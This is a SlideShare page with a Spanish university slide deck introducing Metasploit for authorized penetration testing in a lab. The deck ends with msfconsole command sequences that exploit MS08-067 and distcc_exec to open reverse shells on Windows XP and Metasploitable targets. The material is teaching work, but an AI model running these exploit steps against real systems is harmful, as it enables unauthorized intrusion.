SlideShare una empresa de Scribd logo
1 de 14
Descargar para leer sin conexión
METASPLOIT
Cristian Alejandro Rojas
carojasq@correo.udistrital.edu.co
Universidad Distrital Francisco José de Caldas
Etapas del hacking ético
Qué es un test de penetración?
• Simulación de un ataque real
• Obtener una autorizaciónpara hacer el ataque
• Reportar al cliente los descubrimientos y
recomendaciones
• Encontrar y arreglar vulnerabilidadesantes de
que un atacante real las pueda explotar
Objetivos en el laboratorio
• Windows XP SP3
10.20…….
• Ubuntu Linux 8.04Metasploitable
10.20……
Terminologia
• Exploit: Vector para penetrar el sistema.
• Payload: Es la “bomba” que estalla una vez
está adentro del sistema.
• Encoder: Codificadordel payload.
• Shellcode: Un set de instrucciones usado
como payload.
• Listener: Escucha para una conexión entrante.
• Session: Conexión de un exploit exitoso
METASPLOIT
• Framework de explotación de vulnerabilidades
• Basado en Ruby
• Modular
• Exploits, Payloads, Auxiliaries.
Interfaces
• MSFconsole:Es la mas conocida, provee
acceso a la gran mayoría de las opciones del
framework. (Intecractiva).
Interfaces
• MSFCli: Sirve para correr un ataque
directamente desde la consola sin necesidad
de ser interactivo.
Utilidades
• MSFPayload:Es capaz de generar un
ejecutable con el payload solamente.
Interactuando con msfconsole
• use <module> - Configura el exploit a usar
• set <x X> - Configura un parametro
• setg <x X> - Define un parametro globalmente
• show <x> - Muestra un <x> (exploits, payloads,
options, etc)
• help <x> - Muestra ayuda acerca de X
• Info <module> muestra información acerca de un
módulo
• exploit – Ejecuta el módulo seleccionado.
Meterpreter
• Payload
• Nunca escribe en el disco, solo corre en
memoria.
• Provee comandos con funcionalidades
adicionales: help, background,ps, migrate,
getuid, download, upload,hashdump, shell.
• Facilita escalamiento de privilegios
(getsystem).
Metasploitable
• Ubuntu 8.08
• Entorno para practicar explotación de
vulnerabilidades
• Vulnerabilidades de sistema operativo y
también web.
Explotando una vulnerabilidad en
Windows XP SP3
• Ms08_67 -> Vulnerabilidad numero 67
reportada en 2008 aceptada por microsoft.
search windows/smb
info windows/smb/ms08_067_netapi
use windows/smb/ms08_067_netapi
show payloads
set payload windows/meterpreter/reverse_tcp
show options
set lhost 192.168.20.22
exploit
Explotando una vulnerabilidad en
metasploitable (Linux)
search distcc
use unix/misc/distcc_exec
show payloads
set payload cmd/unix/reverse
show options
set rhost 192.168.20.23
set lhost 192.168.20.102 (ip local)
exploit

Más contenido relacionado

La actualidad más candente

Oak, the architecture of Apache Jackrabbit 3
Oak, the architecture of Apache Jackrabbit 3Oak, the architecture of Apache Jackrabbit 3
Oak, the architecture of Apache Jackrabbit 3Jukka Zitting
 
Intrusion Detection System using Snort
Intrusion Detection System using Snort Intrusion Detection System using Snort
Intrusion Detection System using Snort webhostingguy
 
MongoDB Fundamentals
MongoDB FundamentalsMongoDB Fundamentals
MongoDB FundamentalsMongoDB
 
Siber Guvenlik ve Etik Hhacking -2-
Siber Guvenlik ve Etik Hhacking -2-Siber Guvenlik ve Etik Hhacking -2-
Siber Guvenlik ve Etik Hhacking -2-Murat KARA
 
Nginx Reverse Proxy with Kafka.pptx
Nginx Reverse Proxy with Kafka.pptxNginx Reverse Proxy with Kafka.pptx
Nginx Reverse Proxy with Kafka.pptxwonyong hwang
 
Getting started with Ansible
Getting started with AnsibleGetting started with Ansible
Getting started with AnsibleIvan Serdyuk
 
(참고) Elk stack 설치 및 kafka
(참고) Elk stack 설치 및 kafka(참고) Elk stack 설치 및 kafka
(참고) Elk stack 설치 및 kafkaNoahKIM36
 
Siber Guvenlik ve Etik Hacking -1- Güncelleme 2018
Siber Guvenlik ve Etik Hacking -1- Güncelleme 2018Siber Guvenlik ve Etik Hacking -1- Güncelleme 2018
Siber Guvenlik ve Etik Hacking -1- Güncelleme 2018Murat KARA
 
Windows 10 Nt Heap Exploitation (English version)
Windows 10 Nt Heap Exploitation (English version)Windows 10 Nt Heap Exploitation (English version)
Windows 10 Nt Heap Exploitation (English version)Angel Boy
 
Open Source IDS Tools: A Beginner's Guide
Open Source IDS Tools: A Beginner's GuideOpen Source IDS Tools: A Beginner's Guide
Open Source IDS Tools: A Beginner's GuideAlienVault
 
MongoDB- Crud Operation
MongoDB- Crud OperationMongoDB- Crud Operation
MongoDB- Crud OperationEdureka!
 
Linux System Monitoring
Linux System Monitoring Linux System Monitoring
Linux System Monitoring PriyaTeli
 
Container security
Container securityContainer security
Container securityAnthony Chow
 
Uygulama katmani ve ağ protokolleri̇
Uygulama katmani ve ağ protokolleri̇Uygulama katmani ve ağ protokolleri̇
Uygulama katmani ve ağ protokolleri̇Esra Acar
 
Hacker’ların Yeni Gozdesi - PowerShell
Hacker’ların Yeni Gozdesi - PowerShellHacker’ların Yeni Gozdesi - PowerShell
Hacker’ların Yeni Gozdesi - PowerShellAdeo Security
 
Automation with ansible
Automation with ansibleAutomation with ansible
Automation with ansibleKhizer Naeem
 

La actualidad más candente (20)

Oak, the architecture of Apache Jackrabbit 3
Oak, the architecture of Apache Jackrabbit 3Oak, the architecture of Apache Jackrabbit 3
Oak, the architecture of Apache Jackrabbit 3
 
Intrusion Detection System using Snort
Intrusion Detection System using Snort Intrusion Detection System using Snort
Intrusion Detection System using Snort
 
MongoDB Fundamentals
MongoDB FundamentalsMongoDB Fundamentals
MongoDB Fundamentals
 
Siber Guvenlik ve Etik Hhacking -2-
Siber Guvenlik ve Etik Hhacking -2-Siber Guvenlik ve Etik Hhacking -2-
Siber Guvenlik ve Etik Hhacking -2-
 
Nginx Reverse Proxy with Kafka.pptx
Nginx Reverse Proxy with Kafka.pptxNginx Reverse Proxy with Kafka.pptx
Nginx Reverse Proxy with Kafka.pptx
 
ansible why ?
ansible why ?ansible why ?
ansible why ?
 
Getting started with Ansible
Getting started with AnsibleGetting started with Ansible
Getting started with Ansible
 
(참고) Elk stack 설치 및 kafka
(참고) Elk stack 설치 및 kafka(참고) Elk stack 설치 및 kafka
(참고) Elk stack 설치 및 kafka
 
Siber Guvenlik ve Etik Hacking -1- Güncelleme 2018
Siber Guvenlik ve Etik Hacking -1- Güncelleme 2018Siber Guvenlik ve Etik Hacking -1- Güncelleme 2018
Siber Guvenlik ve Etik Hacking -1- Güncelleme 2018
 
Windows 10 Nt Heap Exploitation (English version)
Windows 10 Nt Heap Exploitation (English version)Windows 10 Nt Heap Exploitation (English version)
Windows 10 Nt Heap Exploitation (English version)
 
Open Source IDS Tools: A Beginner's Guide
Open Source IDS Tools: A Beginner's GuideOpen Source IDS Tools: A Beginner's Guide
Open Source IDS Tools: A Beginner's Guide
 
Zen map
Zen mapZen map
Zen map
 
MongoDB- Crud Operation
MongoDB- Crud OperationMongoDB- Crud Operation
MongoDB- Crud Operation
 
Nmap basics
Nmap basicsNmap basics
Nmap basics
 
Linux System Monitoring
Linux System Monitoring Linux System Monitoring
Linux System Monitoring
 
Linux file system
Linux file systemLinux file system
Linux file system
 
Container security
Container securityContainer security
Container security
 
Uygulama katmani ve ağ protokolleri̇
Uygulama katmani ve ağ protokolleri̇Uygulama katmani ve ağ protokolleri̇
Uygulama katmani ve ağ protokolleri̇
 
Hacker’ların Yeni Gozdesi - PowerShell
Hacker’ların Yeni Gozdesi - PowerShellHacker’ların Yeni Gozdesi - PowerShell
Hacker’ların Yeni Gozdesi - PowerShell
 
Automation with ansible
Automation with ansibleAutomation with ansible
Automation with ansible
 

Similar a Metasploit

Ethical hacking 01
Ethical hacking 01Ethical hacking 01
Ethical hacking 01Tensor
 
Ethical hacking 02
Ethical hacking 02Ethical hacking 02
Ethical hacking 02Tensor
 
Wordpress hardening (Campus Party Mexico 4)
Wordpress hardening (Campus Party Mexico 4)Wordpress hardening (Campus Party Mexico 4)
Wordpress hardening (Campus Party Mexico 4)hecky NeobitsOrg
 
Backbox Distribución deriva de Ubuntu
Backbox Distribución deriva de UbuntuBackbox Distribución deriva de Ubuntu
Backbox Distribución deriva de UbuntuJosé Moreno
 
Armitage pruebas
Armitage pruebasArmitage pruebas
Armitage pruebasTensor
 
AMENAZAS EN LA RED- METAPLOIT.pptx
AMENAZAS EN LA RED- METAPLOIT.pptxAMENAZAS EN LA RED- METAPLOIT.pptx
AMENAZAS EN LA RED- METAPLOIT.pptxHectorDeJesusTapiaGo
 
Memoria Pruebas de intrusion mediante Metasploit Framework
Memoria Pruebas de intrusion mediante Metasploit FrameworkMemoria Pruebas de intrusion mediante Metasploit Framework
Memoria Pruebas de intrusion mediante Metasploit FrameworkErlaitzParreoMuoz
 
Limahack 2010 - Creando exploits para GNU/Linux
Limahack 2010 - Creando exploits para GNU/LinuxLimahack 2010 - Creando exploits para GNU/Linux
Limahack 2010 - Creando exploits para GNU/LinuxMauricio Velazco
 
Metasploit - Bypass UAC fodhelper [Post-explotación]
Metasploit - Bypass UAC fodhelper [Post-explotación]Metasploit - Bypass UAC fodhelper [Post-explotación]
Metasploit - Bypass UAC fodhelper [Post-explotación]Adrián Lois
 
Los sistemas operativos
Los sistemas operativosLos sistemas operativos
Los sistemas operativospablito1103
 
Sistema operativo
Sistema operativoSistema operativo
Sistema operativoleonfeliz
 
Análisis Forense Memoria RAM
Análisis Forense Memoria RAMAnálisis Forense Memoria RAM
Análisis Forense Memoria RAMConferencias FIST
 
El sistema operativo
El sistema operativoEl sistema operativo
El sistema operativoAndrea_Huerga
 
El sistema operativo
El sistema operativoEl sistema operativo
El sistema operativolavinusa
 

Similar a Metasploit (20)

Ethical hacking 01
Ethical hacking 01Ethical hacking 01
Ethical hacking 01
 
Ethical hacking 02
Ethical hacking 02Ethical hacking 02
Ethical hacking 02
 
Virtual PC
Virtual PCVirtual PC
Virtual PC
 
Wordpress hardening (Campus Party Mexico 4)
Wordpress hardening (Campus Party Mexico 4)Wordpress hardening (Campus Party Mexico 4)
Wordpress hardening (Campus Party Mexico 4)
 
Backbox Distribución deriva de Ubuntu
Backbox Distribución deriva de UbuntuBackbox Distribución deriva de Ubuntu
Backbox Distribución deriva de Ubuntu
 
Metasploit v0.5
Metasploit v0.5Metasploit v0.5
Metasploit v0.5
 
Curso de Metasploit
Curso de MetasploitCurso de Metasploit
Curso de Metasploit
 
Atix26
Atix26Atix26
Atix26
 
Armitage pruebas
Armitage pruebasArmitage pruebas
Armitage pruebas
 
Cpods training-metasploit
Cpods training-metasploitCpods training-metasploit
Cpods training-metasploit
 
AMENAZAS EN LA RED- METAPLOIT.pptx
AMENAZAS EN LA RED- METAPLOIT.pptxAMENAZAS EN LA RED- METAPLOIT.pptx
AMENAZAS EN LA RED- METAPLOIT.pptx
 
Memoria Pruebas de intrusion mediante Metasploit Framework
Memoria Pruebas de intrusion mediante Metasploit FrameworkMemoria Pruebas de intrusion mediante Metasploit Framework
Memoria Pruebas de intrusion mediante Metasploit Framework
 
Slideshare
SlideshareSlideshare
Slideshare
 
Limahack 2010 - Creando exploits para GNU/Linux
Limahack 2010 - Creando exploits para GNU/LinuxLimahack 2010 - Creando exploits para GNU/Linux
Limahack 2010 - Creando exploits para GNU/Linux
 
Metasploit - Bypass UAC fodhelper [Post-explotación]
Metasploit - Bypass UAC fodhelper [Post-explotación]Metasploit - Bypass UAC fodhelper [Post-explotación]
Metasploit - Bypass UAC fodhelper [Post-explotación]
 
Los sistemas operativos
Los sistemas operativosLos sistemas operativos
Los sistemas operativos
 
Sistema operativo
Sistema operativoSistema operativo
Sistema operativo
 
Análisis Forense Memoria RAM
Análisis Forense Memoria RAMAnálisis Forense Memoria RAM
Análisis Forense Memoria RAM
 
El sistema operativo
El sistema operativoEl sistema operativo
El sistema operativo
 
El sistema operativo
El sistema operativoEl sistema operativo
El sistema operativo
 

Más de Cristian Alejandro Rojas Quintero (8)

Tipos de datos en R
Tipos de datos en RTipos de datos en R
Tipos de datos en R
 
Análisis de datos: R vs Python
Análisis de datos: R vs PythonAnálisis de datos: R vs Python
Análisis de datos: R vs Python
 
Desarrollo e implentación de una plataforma bioinformática para el análisis R...
Desarrollo e implentación de una plataforma bioinformática para el análisis R...Desarrollo e implentación de una plataforma bioinformática para el análisis R...
Desarrollo e implentación de una plataforma bioinformática para el análisis R...
 
Lenguaje de programación Ruby
Lenguaje de programación RubyLenguaje de programación Ruby
Lenguaje de programación Ruby
 
Tutorial freeradius + Mysql
Tutorial freeradius + MysqlTutorial freeradius + Mysql
Tutorial freeradius + Mysql
 
Nmap
NmapNmap
Nmap
 
High Performance Computing con Software libre
High Performance Computing con Software libreHigh Performance Computing con Software libre
High Performance Computing con Software libre
 
Hpc
HpcHpc
Hpc
 

Último

Presentacion Angeles y Arcangeles con pendulo
Presentacion Angeles y Arcangeles con penduloPresentacion Angeles y Arcangeles con pendulo
Presentacion Angeles y Arcangeles con pendulomagalyreina2
 
Tipos de textos narrativos con ejemplos para practicar
Tipos de textos narrativos con ejemplos para practicarTipos de textos narrativos con ejemplos para practicar
Tipos de textos narrativos con ejemplos para practicarbf99fgtvg2
 
644400074-LA-CONSOLIDACION-DE-LA-REPUBLICA-OLIGARQUICA-pdf.pdf
644400074-LA-CONSOLIDACION-DE-LA-REPUBLICA-OLIGARQUICA-pdf.pdf644400074-LA-CONSOLIDACION-DE-LA-REPUBLICA-OLIGARQUICA-pdf.pdf
644400074-LA-CONSOLIDACION-DE-LA-REPUBLICA-OLIGARQUICA-pdf.pdfRosiClaros
 
guerra de ira presentacion power point m
guerra de ira presentacion power point mguerra de ira presentacion power point m
guerra de ira presentacion power point myeimerestibenmuelas
 
Fundamentos de Ensamblaje de Sistemas informáticos.pptx
Fundamentos de Ensamblaje de Sistemas informáticos.pptxFundamentos de Ensamblaje de Sistemas informáticos.pptx
Fundamentos de Ensamblaje de Sistemas informáticos.pptxJulian Flores
 
SEGURIDAD INFORMATICA ANDERSON D BUSTOS M 29908007 CID4A.pptx
SEGURIDAD INFORMATICA ANDERSON D BUSTOS M 29908007 CID4A.pptxSEGURIDAD INFORMATICA ANDERSON D BUSTOS M 29908007 CID4A.pptx
SEGURIDAD INFORMATICA ANDERSON D BUSTOS M 29908007 CID4A.pptxAndersonBustos2
 
Grupo numero 1 . La memoria. Aprendizaje Fisiológico.Aprendizaje Pedagógico. ...
Grupo numero 1 . La memoria. Aprendizaje Fisiológico.Aprendizaje Pedagógico. ...Grupo numero 1 . La memoria. Aprendizaje Fisiológico.Aprendizaje Pedagógico. ...
Grupo numero 1 . La memoria. Aprendizaje Fisiológico.Aprendizaje Pedagógico. ...franciscooviedogonza
 

Último (7)

Presentacion Angeles y Arcangeles con pendulo
Presentacion Angeles y Arcangeles con penduloPresentacion Angeles y Arcangeles con pendulo
Presentacion Angeles y Arcangeles con pendulo
 
Tipos de textos narrativos con ejemplos para practicar
Tipos de textos narrativos con ejemplos para practicarTipos de textos narrativos con ejemplos para practicar
Tipos de textos narrativos con ejemplos para practicar
 
644400074-LA-CONSOLIDACION-DE-LA-REPUBLICA-OLIGARQUICA-pdf.pdf
644400074-LA-CONSOLIDACION-DE-LA-REPUBLICA-OLIGARQUICA-pdf.pdf644400074-LA-CONSOLIDACION-DE-LA-REPUBLICA-OLIGARQUICA-pdf.pdf
644400074-LA-CONSOLIDACION-DE-LA-REPUBLICA-OLIGARQUICA-pdf.pdf
 
guerra de ira presentacion power point m
guerra de ira presentacion power point mguerra de ira presentacion power point m
guerra de ira presentacion power point m
 
Fundamentos de Ensamblaje de Sistemas informáticos.pptx
Fundamentos de Ensamblaje de Sistemas informáticos.pptxFundamentos de Ensamblaje de Sistemas informáticos.pptx
Fundamentos de Ensamblaje de Sistemas informáticos.pptx
 
SEGURIDAD INFORMATICA ANDERSON D BUSTOS M 29908007 CID4A.pptx
SEGURIDAD INFORMATICA ANDERSON D BUSTOS M 29908007 CID4A.pptxSEGURIDAD INFORMATICA ANDERSON D BUSTOS M 29908007 CID4A.pptx
SEGURIDAD INFORMATICA ANDERSON D BUSTOS M 29908007 CID4A.pptx
 
Grupo numero 1 . La memoria. Aprendizaje Fisiológico.Aprendizaje Pedagógico. ...
Grupo numero 1 . La memoria. Aprendizaje Fisiológico.Aprendizaje Pedagógico. ...Grupo numero 1 . La memoria. Aprendizaje Fisiológico.Aprendizaje Pedagógico. ...
Grupo numero 1 . La memoria. Aprendizaje Fisiológico.Aprendizaje Pedagógico. ...
 

Metasploit

  • 3. Qué es un test de penetración? • Simulación de un ataque real • Obtener una autorizaciónpara hacer el ataque • Reportar al cliente los descubrimientos y recomendaciones • Encontrar y arreglar vulnerabilidadesantes de que un atacante real las pueda explotar
  • 4. Objetivos en el laboratorio • Windows XP SP3 10.20……. • Ubuntu Linux 8.04Metasploitable 10.20……
  • 5. Terminologia • Exploit: Vector para penetrar el sistema. • Payload: Es la “bomba” que estalla una vez está adentro del sistema. • Encoder: Codificadordel payload. • Shellcode: Un set de instrucciones usado como payload. • Listener: Escucha para una conexión entrante. • Session: Conexión de un exploit exitoso
  • 6. METASPLOIT • Framework de explotación de vulnerabilidades • Basado en Ruby • Modular • Exploits, Payloads, Auxiliaries.
  • 7. Interfaces • MSFconsole:Es la mas conocida, provee acceso a la gran mayoría de las opciones del framework. (Intecractiva).
  • 8. Interfaces • MSFCli: Sirve para correr un ataque directamente desde la consola sin necesidad de ser interactivo.
  • 9. Utilidades • MSFPayload:Es capaz de generar un ejecutable con el payload solamente.
  • 10. Interactuando con msfconsole • use <module> - Configura el exploit a usar • set <x X> - Configura un parametro • setg <x X> - Define un parametro globalmente • show <x> - Muestra un <x> (exploits, payloads, options, etc) • help <x> - Muestra ayuda acerca de X • Info <module> muestra información acerca de un módulo • exploit – Ejecuta el módulo seleccionado.
  • 11. Meterpreter • Payload • Nunca escribe en el disco, solo corre en memoria. • Provee comandos con funcionalidades adicionales: help, background,ps, migrate, getuid, download, upload,hashdump, shell. • Facilita escalamiento de privilegios (getsystem).
  • 12. Metasploitable • Ubuntu 8.08 • Entorno para practicar explotación de vulnerabilidades • Vulnerabilidades de sistema operativo y también web.
  • 13. Explotando una vulnerabilidad en Windows XP SP3 • Ms08_67 -> Vulnerabilidad numero 67 reportada en 2008 aceptada por microsoft. search windows/smb info windows/smb/ms08_067_netapi use windows/smb/ms08_067_netapi show payloads set payload windows/meterpreter/reverse_tcp show options set lhost 192.168.20.22 exploit
  • 14. Explotando una vulnerabilidad en metasploitable (Linux) search distcc use unix/misc/distcc_exec show payloads set payload cmd/unix/reverse show options set rhost 192.168.20.23 set lhost 192.168.20.102 (ip local) exploit